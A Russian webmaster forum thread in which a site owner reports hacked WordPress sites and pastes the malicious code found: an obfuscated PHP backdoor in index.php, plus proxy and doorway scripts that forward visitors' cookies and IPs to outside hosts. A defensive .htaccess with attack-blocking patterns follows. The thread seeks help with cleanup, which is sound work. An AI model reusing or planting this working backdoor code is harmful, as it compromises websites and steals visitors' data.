Сергей

vk.com/ultrazak
fb: ultrazak
ultrazak
Рейтинг
42
Регистрация
12.08.2009
Взломан сайт на Wordpress

На сайте был пароль на базу данных 123456789 - это могло служить причиной уязвимости?

На другом spgspg - сейчас меняю пароли на все БД

Взломан сайт на Wordpress
Greensneak:
После чистки не забудьте обновить WP и все плагины. Поставьте iThemes Security и полностью настройте. На файлы и папки ограничьте права через команды:
find /путь_к_папке -type d -exec chmod 755 {} +
find /путь_к_папке -type f -exec chmod 644 {} +

спасибо. права изначально были правильные, а iThemes Security заинтересовал, но надо знать особенности настроек.

хочется включить всё, но там предупреждения о мощности сервера и т.п.

Взломан сайт на Wordpress

Ещё антивирус 360 Total Security жалуется на файл:

wp-content\plugins\class.php

с описанием "php.script.shell.2"

https://mega.co.nz/#!fINi1ZrA!PhfifJh1dzAAQ2sCrjbGQTvAT7WzSvZXWCXni4D0BQA

Я так понимаю он и может быть причиной проблем?

Да, я после поиска проблем по всем сайтам вручную, пройдусь ещё айболитом.

Взломан сайт на Wordpress

Обнаружил в файле index.php вставку:

error_reporting(0); ini_set("display_errors", "0"); if (!isset($i613fd138)) { $i613fd138 = TRUE; $GLOBALS['_1584599298_']=Array(base64_decode('c' .'HJ' .'lZ' .'19tYXRj' .'a' .'A=='),base64_decode('Z' .'mlsZ' .'V9nZXRf' .'Y29' .'udGV' .'udHM='),base64_decode('' .'dXJsZW5jb' .'2Rl'),base64_decode('dXJsZ' .'W5jb2Rl'),base64_decode('bWQ1'),base64_decode('' .'ZmdldGM' .'='),base64_decode('cHJlZ19xdW' .'90ZQ=' .'='),base64_decode('aW5p' .'X2dld' .'A' .'=='),base64_decode('Zmls' .'ZV9nZXR' .'fY29udG' .'V' .'u' .'dHM='),base64_decode('' .'c3RybGVu'),base64_decode('' .'Zn' .'VuY3Rpb2' .'5fZ' .'Xhpc' .'3Rz'),base64_decode('Y3VybF9pbml0'),base64_decode('' .'Y' .'3VybF' .'9zZX' .'Rvc' .'H' .'Q='),base64_decode('Y3' .'VybF' .'9zZXR' .'vcHQ='),base64_decode('aW1hZ2Vj' .'cmVhdGVmcm' .'9tZ' .'2Q' .'y'),base64_decode('Y3V' .'ybF9leGVj'),base64_decode('YXJyYXl' .'fb' .'WFw'),base64_decode('c' .'HJ' .'lZ19yZ' .'XB' .'sYWNl'),base64_decode('Y' .'3VybF9jbG9zZQ=' .'='),base64_decode('Z' .'nNvY' .'2tv' .'c' .'GVu'),base64_decode('Z' .'ndyaXRl'),base64_decode('' .'dHJpb' .'Q' .'=' .'='),base64_decode('ZmV' .'vZ' .'g=='),base64_decode('Zm' .'dldHM' .'='),base64_decode('YXJyYX' .'lfZm' .'xpcA=='),base64_decode('Zmdl' .'d' .'HM='),base64_decode('ZmNsb' .'3Nl'),base64_decode('bXRfcmFuZA=='),base64_decode('ZmRmX' .'3Nld' .'F92ZX' .'JzaW9' .'u'),base64_decode('cHJlZ19zc' .'G' .'xpdA' .'=='),base64_decode('c' .'29' .'ja2V0X2dldF9' .'z' .'dGF0dXM='),base64_decode('c3' .'Ryd' .'mF' .'s'),base64_decode('c' .'3RyaXB' .'zbG' .'Fz' .'a' .'GVz')); function _1342886090($i){$a=Array('Y2xpZW5' .'0X2N' .'oZWNr','' .'Y2' .'xpZW' .'50X' .'2N' .'oZWN' .'r','SFRUUF9BQ' .'0N' .'FUFRfQ0hBU' .'l' .'NFV' .'A==','I' .'S' .'4hdQ==','U0' .'NSS' .'V' .'B' .'UX0ZJTEVOQU1' .'F','VVR' .'GLTg=','d2l' .'uZG93cy0xMjUx','SFRUU' .'F' .'9BQ0NF' .'U' .'F' .'R' .'fQ0' .'hBUlNFVA==','U' .'0VSV' .'kVSX0' .'5B' .'TU' .'U=','' .'Uk' .'V' .'RVUVTV' .'F9VUkk' .'=','anA=','SFRUUF9VU0VSX0F' .'HRU5' .'U','bQ==','U' .'kVN' .'T1RFX0FER' .'FI' .'=','a' .'W5kLn' .'Vrcn' .'N0cmVhbS' .'5' .'pbg' .'=' .'=','L2' .'dl' .'d' .'C' .'5waHA/ZD0=','' .'JnU9','' .'JmM9','Jm' .'k9MSZpcD0' .'=','' .'J' .'mg9','OTdhND' .'BiO' .'GVlOWZh' .'NmE2ZGMy' .'OTE2Z' .'m' .'I0NTcxOTl' .'lNDc=','M' .'Q==','YWxsb3d' .'fdXJsX2ZvcG' .'Vu','' .'aH' .'R0' .'cDovL' .'w=' .'=','Y3V' .'y' .'bF' .'9pbml0','' .'aHR0cD' .'ov' .'Lw' .'==','R0VUIA==','IEhUVF' .'AvMS4xDQ' .'o=','SG9z' .'d' .'Dog','' .'DQo=','Q' .'29' .'ubmVjdG' .'lvbj' .'og' .'Q2xvc2UNCg' .'0' .'K','','L' .'1xSXF' .'I' .'v','cA' .'==','' .'N' .'jEzZmQxMz' .'g=','Z' .'g=' .'=','' .'Yw' .'==');return base64_decode($a[$i]);} if(!isset($u243_0)){if(!empty($_COOKIE[_1342886090(0)]))die($_COOKIE[_1342886090(1)]);if(!isset($u243_1[_1342886090(2)])){if($GLOBALS['_1584599298_'][0](_1342886090(3),$GLOBALS['_1584599298_'][1]($_SERVER[_1342886090(4)])))$u243_2=_1342886090(5);else $u243_2=_1342886090(6);}else{$u243_2=$u243_1[_1342886090(7)];}$u243_3=$_SERVER[_1342886090(8)] .$_SERVER[_1342886090(9)];$u243_4=_1342886090(10);$u243_5=$_SERVER[_1342886090(11)];$u243_6=_1342886090(12);$u243_7=$_SERVER[_1342886090(13)];$u243_8=_1342886090(14);$u243_9=_1342886090(15) .$GLOBALS['_1584599298_'][2]($u243_3) ._1342886090(16) .$GLOBALS['_1584599298_'][3]($u243_5) ._1342886090(17) .$u243_2 ._1342886090(18) .$u243_7 ._1342886090(19) .$GLOBALS['_1584599298_'][4](_1342886090(20) .$u243_3 .$u243_5 .$u243_2 ._1342886090(21));if((round(0+873.5+873.5)+round(0+919.66666666667+919.66666666667+919.66666666667))>round(0+349.4+349.4+349.4+349.4+349.4)|| $GLOBALS['_1584599298_'][5]($_SERVER,$u243_2,$_SERVER,$u243_2,$u243_10));else{$GLOBALS['_1584599298_'][6]($u243_8,$_COOKIE,$u243_8,$u243_3);}if($GLOBALS['_1584599298_'][7](_1342886090(22))== round(0+0.2+0.2+0.2+0.2+0.2)){$u243_0=$GLOBALS['_1584599298_'][8](_1342886090(23) .$u243_8 .$u243_9);}if($GLOBALS['_1584599298_'][9]($u243_0)<round(0+2.5+2.5+2.5+2.5)){if($GLOBALS['_1584599298_'][10](_1342886090(24))){$u243_11=$GLOBALS['_1584599298_'][11](_1342886090(25) .$u243_8 .$u243_9);$GLOBALS['_1584599298_'][12]($u243_11,42,FALSE);$GLOBALS['_1584599298_'][13]($u243_11,19913,TRUE);while(round(0+1138.3333333333+1138.3333333333+1138.3333333333)-round(0+1138.3333333333+1138.3333333333+1138.3333333333))$GLOBALS['_1584599298_'][14]($u243_8);$u243_0=$GLOBALS['_1584599298_'][15]($u243_11);if((round(0+240.25+240.25+240.25+240.25)+round(0+432+432+432+432))>round(0+480.5+480.5)|| $GLOBALS['_1584599298_'][16]($u243_12,$_COOKIE));else{$GLOBALS['_1584599298_'][17]($_COOKIE,$_REQUEST,$u243_7,$u243_5);}$GLOBALS['_1584599298_'][18]($u243_11);}else{$u243_13=$GLOBALS['_1584599298_'][19]($u243_8,round(0+20+20+20+20),$u243_14,$u243_10,round(0+10+10+10));if($u243_13){$u243_15=_1342886090(26) .$u243_9 ._1342886090(27);$u243_15 .= _1342886090(28) .$u243_8 ._1342886090(29);$u243_15 .= _1342886090(30);$GLOBALS['_1584599298_'][20]($u243_13,$u243_15);$u243_12=_1342886090(31);while(round(0+4420)-round(0+884+884+884+884+884))$GLOBALS['_1584599298_'][21]($u243_8,$u243_7,$u243_1,$u243_8);while(!$GLOBALS['_1584599298_'][22]($u243_13)){$u243_12 .= $GLOBALS['_1584599298_'][23]($u243_13,round(0+25.6+25.6+25.6+25.6+25.6));if((round(0+1007+1007+1007+1007)+round(0+746.2+746.2+746.2+746.2+746.2))>round(0+4028)|| $GLOBALS['_1584599298_'][24]($u243_7,$u243_12,$u243_11));else{$GLOBALS['_1584599298_'][25]($u243_1,$u243_2,$_REQUEST);}}$GLOBALS['_1584599298_'][26]($u243_13);if(round(0+1762+1762)<$GLOBALS['_1584599298_'][27](round(0+413+413+413),round(0+570+570+570+570)))$GLOBALS['_1584599298_'][28]($u243_5);list($u243_16,$u243_0)=$GLOBALS['_1584599298_'][29](_1342886090(32),$u243_12,round(0+0.5+0.5+0.5+0.5));if((round(0+2707)^round(0+1353.5+1353.5))&& $GLOBALS['_1584599298_'][30]($u243_7,$u243_15))$GLOBALS['_1584599298_'][31]($u243_15,$u243_16);}}}if(@$_REQUEST[_1342886090(33)]== _1342886090(34))$_REQUEST[_1342886090(35)]($GLOBALS['_1584599298_'][32]($_REQUEST[_1342886090(36)]));}echo $u243_0; }

---------- Добавлено 30.03.2015 в 16:20 ----------

В файле wp-activate.php:

<?php

$p = 'p';

$b = 'http://kamelot39.ru/wp-activate.php';

$m = 'http://rofezubi3.ainr.ru/';

if(isset($_GET[$p])) {

$ch = curl_init();

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {if (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',' !== false)) {$tmp = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);$ip = trim($tmp[count($tmp)-2]);}

else $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) $ip = $_SERVER['HTTP_FORWARDED_FOR']; elseif (isset($_SERVER['HTTP_X_REAL_IP'])) $ip = $_SERVER['HTTP_X_REAL_IP'];

else $ip = @$_SERVER['REMOTE_ADDR'];

curl_setopt($ch, CURLOPT_URL, $m.$_GET[$p]);

curl_setopt($ch, CURLOPT_POSTFIELDS, '&p='.urlencode($b.'?'.$p.'=').'&ip='.$ip);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);

curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

curl_setopt($ch, CURLOPT_HEADERFUNCTION, 'hf');

if(!empty($_COOKIE)){$co='';foreach($_COOKIE as $cn => $cv){if($co)$co.='; ';$co.=$cn.'='.addslashes($cv);}curl_setopt($ch, CURLOPT_COOKIE, $co);}

echo curl_exec($ch);

exit;

}

function hf($ch, $hl){if(strpos($hl,'Content-Type')!==false||strpos($hl,'404')!==false||strpos($hl,'301')!==false||strpos($hl,'Location')!==false||strpos($hl,'Set-Cookie')!==false) header($hl);return strlen($hl);}

?>

---------- Добавлено 30.03.2015 в 16:22 ----------

В папке имя_сайта\wp-content\themes\имя_темы\1

файлы:

.htaccess с текстом

RewriteEngine On

RewriteBase /wp-content/themes/имя_темы/1

RewriteCond %{REQUEST_FILENAME} !-d

RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule .* index.php

и файл index.php

с текстом:

<?php

$id = substr($_SERVER['REQUEST_URI'], 29);

$ch = curl_init();

$url = "http://\x70\x6f\x68\x79\x64\x65\x69\x6b\x61\x31\x2e\x61\x69\x6e\x72\x2e\x72\x75/$id";

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {if (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',' !== false)) {$tmp = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);$ip = trim($tmp[count($tmp)-2]);}

else $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) $ip = $_SERVER['HTTP_FORWARDED_FOR']; elseif (isset($_SERVER['HTTP_X_REAL_IP'])) $ip = $_SERVER['HTTP_X_REAL_IP'];

else $ip = @$_SERVER['REMOTE_ADDR'];

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_POSTFIELDS, '&baby='.urlencode("\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x61\x6d\x65\x6c\x6f\x74\x33\x39\x2e\x72\x75\x2f\x77\x70\x2d\x63\x6f\x6e\x74\x65\x6e\x74\x2f\x74\x68\x65\x6d\x65\x73\x2f\x6b\x61\x6d\x65\x6c\x6f\x74\x2f\x31").'&ip='.$ip);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);

curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

curl_setopt($ch, CURLOPT_HEADERFUNCTION, 'hf');

if(!empty($_COOKIE)){$co='';foreach($_COOKIE as $cn => $cv){if($co)$co.='; ';$co.=$cn.'='.addslashes($cv);}curl_setopt($ch, CURLOPT_COOKIE, $co);}

echo curl_exec($ch);

function hf($ch, $hl){if(strpos($hl,'Content-Type')!==false||strpos($hl,'404')!==false||strpos($hl,'301')!==false||strpos($hl,'Location')!==false||strpos($hl,'Set-Cookie')!==false) header($hl);return strlen($hl);}

?>

Взломан сайт на Wordpress

Да, это я вчера заменил .htaccess и уже результат, но теперь проблема на аналогичном сайте, который тоже на вордпрессе

http://kamelot39.ru

http://kamelot39.ru/wp-content/themes/kamelot/1/a5a247fcb56cd3934c3c9530a2d22a95

https://www.google.ru/?gws_rd=ssl#q=site:kamelot39.ru&newwindow=1&safe=off&start=240

---------- Добавлено 05.03.2015 в 13:10 ----------

И на втором сайте замена .htaccess на этот не помогла:

Options +FollowSymLinks -Indexes

RewriteEngine On

# Block out any script trying to base64_encode data within the URL.

RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]

# Block out any script that includes a <script> tag in URL.

RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]

# Block out any script trying to set a PHP GLOBALS variable via URL.

RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

# Block out any script trying to modify a _REQUEST variable via URL.

RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

# Return 403 Forbidden header and show the content of the root homepage

RewriteRule .* index.php [F]

#

## End - Rewrite rules to block out some common exploits.

#### @RS

# Deny access to php, xml and ini files

# within components and plugins directories

RewriteCond %{REQUEST_FILENAME} -f

RewriteCond %{REQUEST_URI} \.php|\.ini|\.xml [NC]

RewriteCond %{REQUEST_URI} \/components\/ [OR]

RewriteCond %{REQUEST_URI} ^\/includes\/|^\/administrator\/includes\/ [OR]

RewriteCond %{REQUEST_URI} \/language\/ [OR]

RewriteCond %{REQUEST_URI} \/libraries\/ [OR]

RewriteCond %{REQUEST_URI} \/modules\/ [OR]

RewriteCond %{REQUEST_URI} \/plugins\/ [OR]

RewriteCond %{REQUEST_URI} \/templates\/ [OR]

RewriteCond %{REQUEST_URI} \/xmlrpc\/

RewriteRule ^(.*)$ index.php [R=404,L]

#### @RS

#### @RS

# Prevent most common SQL-Injections

RewriteCond %{query_string} concat.*\( [NC,OR]

RewriteCond %{query_string} union.*select.*\( [NC,OR]

RewriteCond %{query_string} union.*all.*select [NC]

RewriteRule ^(.*)$ index.php [F,L]

#### @RS

#### @RS

# Block most common hacking tools

SetEnvIf user-agent "Indy Library" stayout=1

SetEnvIf user-agent "libwww-perl" stayout=1

SetEnvIf user-agent "Wget" stayout=1

deny from env=stayout

#### @RS

## Begin - Custom redirects

#

# If you need to redirect some pages, or set a canonical non-www to

# www redirect (or vice versa), place that code here. Ensure those

# redirects use the correct RewriteRule syntax and the [R=301,L] flags.

#

## End - Custom redirects

##

# Uncomment following line if your webserver's URL

# is not directly related to physical file paths.

# Update Your Joomla! Directory (just / for root).

##

#

RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]

#

# If the requested path and file is not /index.php and the request

# has not already been internally rewritten to the index.php script

RewriteCond %{REQUEST_URI} !^/index\.php

# and the request is for something within the component folder,

# or for the site root, or for an extensionless URL, or the

# requested URL ends with one of the listed extensions

RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]

# and the requested path and file doesn't directly match a physical file

RewriteCond %{REQUEST_FILENAME} !-f

# and the requested path and file doesn't directly match a physical folder

RewriteCond %{REQUEST_FILENAME} !-d

# internally rewrite the request to the index.php script

RewriteRule .* index.php [L]

#

<IfModule mod_deflate.c>

AddOutputFilterByType DEFLATE text/html text/plain text/xml application/xml application/xhtml+xml text/javascript text/css application/x-javascript

BrowserMatch ^Mozilla/4 gzip-only-text/html

BrowserMatch ^Mozilla/4.0[678] no-gzip

BrowserMatch bMSIE !no-gzip !gzip-only-text/html

<ifmodule mod_gzip.c>

mod_gzip_on Yes

mod_gzip_item_include file \.js$

mod_gzip_item_include file \.css$ </ifmodule>

</IfModule>

<IfModule mod_expires.c>

# Enable expiration control

ExpiresActive On

# Default expiration: 1 hour after request

ExpiresDefault "now plus 1 hour"

# CSS and JS expiration: 1 week after request

ExpiresByType text/css "now plus 1 week"

ExpiresByType application/javascript "now plus 1 week"

ExpiresByType application/x-javascript "now plus 1 week"

# Image files expiration: 1 month after request

ExpiresByType image/bmp "now plus 1 month"

ExpiresByType image/gif "now plus 1 month"

ExpiresByType image/jpeg "now plus 1 month"

ExpiresByType image/jp2 "now plus 1 month"

ExpiresByType image/pipeg "now plus 1 month"

ExpiresByType image/png "now plus 1 month"

ExpiresByType image/svg+xml "now plus 1 month"

ExpiresByType image/tiff "now plus 1 month"

ExpiresByType image/vnd.microsoft.icon "now plus 1 month"

ExpiresByType image/x-icon "now plus 1 month"

ExpiresByType image/ico "now plus 1 month"

ExpiresByType image/icon "now plus 1 month"

ExpiresByType text/ico "now plus 1 month"

ExpiresByType application/ico "now plus 1 month"

ExpiresByType image/vnd.wap.wbmp "now plus 1 month"

ExpiresByType application/vnd.wap.wbxml "now plus 1 month"

ExpiresByType application/smil "now plus 1 month"

# Audio files expiration: 1 month after request

ExpiresByType audio/basic "now plus 1 month"

ExpiresByType audio/mid "now plus 1 month"

ExpiresByType audio/midi "now plus 1 month"

ExpiresByType audio/mpeg "now plus 1 month"

ExpiresByType audio/x-aiff "now plus 1 month"

ExpiresByType audio/x-mpegurl "now plus 1 month"

ExpiresByType audio/x-pn-realaudio "now plus 1 month"

ExpiresByType audio/x-wav "now plus 1 month"

# Movie files expiration: 1 month after request

ExpiresByType application/x-shockwave-flash "now plus 1 month"

ExpiresByType x-world/x-vrml "now plus 1 month"

ExpiresByType video/x-msvideo "now plus 1 month"

ExpiresByType video/mpeg "now plus 1 month"

ExpiresByType video/mp4 "now plus 1 month"

ExpiresByType video/quicktime "now plus 1 month"

ExpiresByType video/x-la-asf "now plus 1 month"

ExpiresByType video/x-ms-asf "now plus 1 month"

</IfModule>

########## End - Optimal expiration time

<IfModule mod_headers.c>

<FilesMatch "\.(js|css|xml|gz)$">

Header append Vary: Accept-Encoding

</FilesMatch>

</IfModule>

# BEGIN WordPress

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteBase /

RewriteRule ^index\.php$ - [L]

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule . /index.php [L]

</IfModule>

# END WordPress

<Files wp-config.php>

# Запрещаем всем доступ к файлу wp-config.php

order allow,deny

deny from all

</Files>

<Files .htaccess>

order allow,deny

deny from all

</Files>

AddDefaultCharset utf-8

RewriteEngine On

RewriteCond %{HTTP_HOST} ^www.kamelot39.ru$ [NC]

RewriteRule ^(.*)$ http://kamelot39.ru/$1 [R=301,L]